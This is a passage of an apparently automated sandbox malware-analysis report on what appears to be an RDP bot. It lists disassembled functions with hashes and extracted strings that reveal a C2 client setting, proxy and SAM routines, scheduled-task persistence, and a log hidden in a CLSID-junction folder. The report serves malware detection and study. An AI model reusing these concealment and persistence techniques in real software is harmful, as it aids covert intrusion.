                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                    • API String ID: 1004003707-2349658452
                    • Opcode ID: 487e31b225751ea3932902563ad00909ebac7d89d154fe2b6fceb74eda358456
                    • Instruction ID: 9b0912578886116a81987c5c4c44bf5b6750102ee600f4478cc9fca2ba00daaa
                    • Opcode Fuzzy Hash: 487e31b225751ea3932902563ad00909ebac7d89d154fe2b6fceb74eda358456
                    • Instruction Fuzzy Hash: D9414BA2A19AC796FA248F4CE9803F46360BF443C8F554536EB6D46196DF7CEA46F300
                    Function 00007FF8BFB58409 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                    • API String ID: 1004003707-693788558
                    • Opcode ID: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                    • Instruction ID: 742dd8ba5f68486097fb4edf1a5f10ad994634536fe86cb358ed1482fa22ede2
                    • Opcode Fuzzy Hash: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                    • Instruction Fuzzy Hash: 0F412A61A09687A1FA209FD9F960BB8B360BF507C9F445136EB4D0A595DF3CFA96C300
                    Function 00007FF8BFB8C3C9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$cnccli$ini_get_sec$server_host
                    • API String ID: 1004003707-1509792781
                    • Opcode ID: cec21c9f73427ec2da6491224bd564f2f11f16dbc1f39dfadc49aebaa499689f
                    • Instruction ID: 660eefcef5034ac8e8b39a72640d4d9cc1f1a02ce92b75d51c5e348403d12047
                    • Opcode Fuzzy Hash: cec21c9f73427ec2da6491224bd564f2f11f16dbc1f39dfadc49aebaa499689f
                    • Instruction Fuzzy Hash: 2541EBE2A0964795FA209FD8E8417F46350AF843D8F888536DB4D5B5E6DF3DE58AC300
                    Function 00007FF8B915C2C9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                    • API String ID: 1004003707-693788558
                    • Opcode ID: f3b89cb6aefd98be79687eaabfb69af6a5614a3a306acbc797dd2fc7ffb4115a
                    • Instruction ID: fb7dab05c66821b3b72e5ff386bbbd29d16671e27b3e38712a75eed6b50636a7
                    • Opcode Fuzzy Hash: f3b89cb6aefd98be79687eaabfb69af6a5614a3a306acbc797dd2fc7ffb4115a
                    • Instruction Fuzzy Hash: 94414962F086C7A6FA528F58E9417F82351AF007C8F458536DB4D1A596DF3DF986E300
                    Function 00007FF8BFB538AE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                    • Instruction ID: 6af90cc4b8b3021cbfa118ed8a0c5d89c4f2d72fedbe9bc540b588d1d096dc21
                    • Opcode Fuzzy Hash: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                    • Instruction Fuzzy Hash: 56310CA2E09607A1FE519BDDE8603B97362AF44BC4F588435DA4E1B7A1EE3CF8558340
                    Function 00007FF8BFB89D6E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                    • Instruction ID: 5b66072a1bff8190818ed39ff715ad96b81ae6efc3ba16493f5d8e0044077d6f
                    • Opcode Fuzzy Hash: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                    • Instruction Fuzzy Hash: 1E310E61F0961791FE109F8DE8407B52791AF84FC5F989535CB4E473A6EE2CA945C340
                    Function 00007FF8B9151AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                    • Instruction ID: 799effd68652332ccc69ce4f3674460035339f01548c6f7b314710808e2707e1
                    • Opcode Fuzzy Hash: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                    • Instruction Fuzzy Hash: D1311764E09A9385FA129F1DE8603B52361AF44BC4F9AC435DB4D1B2A4EF6CF985F300
                    Function 00007FF8BA501AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 95db56508a070af681d481542748a3197114f80687e374468034128ed152e278
                    • Instruction ID: 19947cbe8e0dcef0503f328d5567c7c38baed407738b4202035a7d22951c7aae
                    • Opcode Fuzzy Hash: 95db56508a070af681d481542748a3197114f80687e374468034128ed152e278
                    • Instruction Fuzzy Hash: 07310A60A0D603D1FA619B9DECA03B62351BF46BD4F4490B6DE4D4B2B4EF2CAB49C301
                    Function 00007FF8B918F18E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                    • Instruction ID: ad2bfea5774450aa2002049a40baa09234ccdd700e424db7ae88bcff5981aac5
                    • Opcode Fuzzy Hash: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                    • Instruction Fuzzy Hash: D5314169E0DA8781FA549F4CE8807746352AF45BD4FA98031DB0D473A5EF2CE946F390
                    Function 00007FF8B918785C Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                    • API String ID: 3179112426-3318474754
                    • Opcode ID: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                    • Instruction ID: 86d01740d5396e5df4845fb854c92d21b9e2246347f93b25eb4ff050f73164ba
                    • Opcode Fuzzy Hash: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                    • Instruction Fuzzy Hash: 8331D650E1C68382FB215F5CA4C03B86294AF063E4F664932C75E462B3DE5DBD85B322
                    Function 00007FF8B9155A84 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                    • API String ID: 3179112426-2019511216
                    • Opcode ID: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                    • Instruction ID: 314d58a39b00f78a14d885fedfcd0eb8c61d4e20236455cca1c6c31ad79b8b6f
                    • Opcode Fuzzy Hash: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                    • Instruction Fuzzy Hash: 1F31E960E0C78782FB215F1CA4D83BD22629F043C4FA65536D70E462A1DE7EB985F751
                    Function 00007FF8BA50A060 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 145stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strlen$strcpy
                    • String ID: *$schtasks
                    • API String ID: 2790333442-2394224502
                    • Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                    • Instruction ID: aed607c36184697332da19e459bb665b18b17adbd25dc08a134b4b8d12dbeab1
                    • Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                    • Instruction Fuzzy Hash: 6A51B422A4C683CAF7719A9DAC953BE5251AB963C4F4800B5EF4E473E6DE7DDB048700
                    Function 00007FF8BFAB660A Relevance: 16.6, APIs: 7, Strings: 4, Instructions: 104memorysleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                    • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                    • API String ID: 3537583691-1494920791
                    • Opcode ID: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                    • Instruction ID: 28e51d95f12ae4c178f091e5892c249e49ac5703b15a57fdf357aa5003566d2e
                    • Opcode Fuzzy Hash: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                    • Instruction Fuzzy Hash: A1419A62A08B4286EB188F99E85667A67A0FB44BCCF446035DF0D43796EE3CE489C700
                    Function 00007FF7088799E2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                    • API String ID: 513531256-4171087551
                    • Opcode ID: 3aa85008c737a7422c3167a565b94840adc05c6d64a34166f4daf9ff1a3abf69
                    • Instruction ID: 9d2a3bb88da730f062ef7a2f57ce0887d08487f59c0ac2e4a3c20e336e04a467
                    • Opcode Fuzzy Hash: 3aa85008c737a7422c3167a565b94840adc05c6d64a34166f4daf9ff1a3abf69
                    • Instruction Fuzzy Hash: B0416B21A6C64286F320FB15EC55BAAE6A1FF88B84FC40031DA4D577D5CF3CE5A18768
                    Function 00007FF8BFB58AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                    • Instruction ID: b0de49f1424ae57908a201f7c79efa8160a963368e0d18f1f08b488ea54e4b06
                    • Opcode Fuzzy Hash: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                    • Instruction Fuzzy Hash: 5F217C62A09A86A5E7119F99FC50BAA7365FB447C4F444032EF4C47764DF3CE995C700
                    Function 00007FF8BFB8CA74 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 86f798423a90631b684bbec975e772917ddb9f341768e14ebb927b92ead05de6
                    • Instruction ID: 1b2a34692f54fe5f1fdebf2969dc601f2bd5b56e31d2b2d2b822f3f7aca0edf6
                    • Opcode Fuzzy Hash: 86f798423a90631b684bbec975e772917ddb9f341768e14ebb927b92ead05de6
                    • Instruction Fuzzy Hash: EE217CA2A09A4696E6519F9DFC407AA73A0FB887D4F848036EF4C477A5DF3CE945C700
                    Function 00007FF8B915C974 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
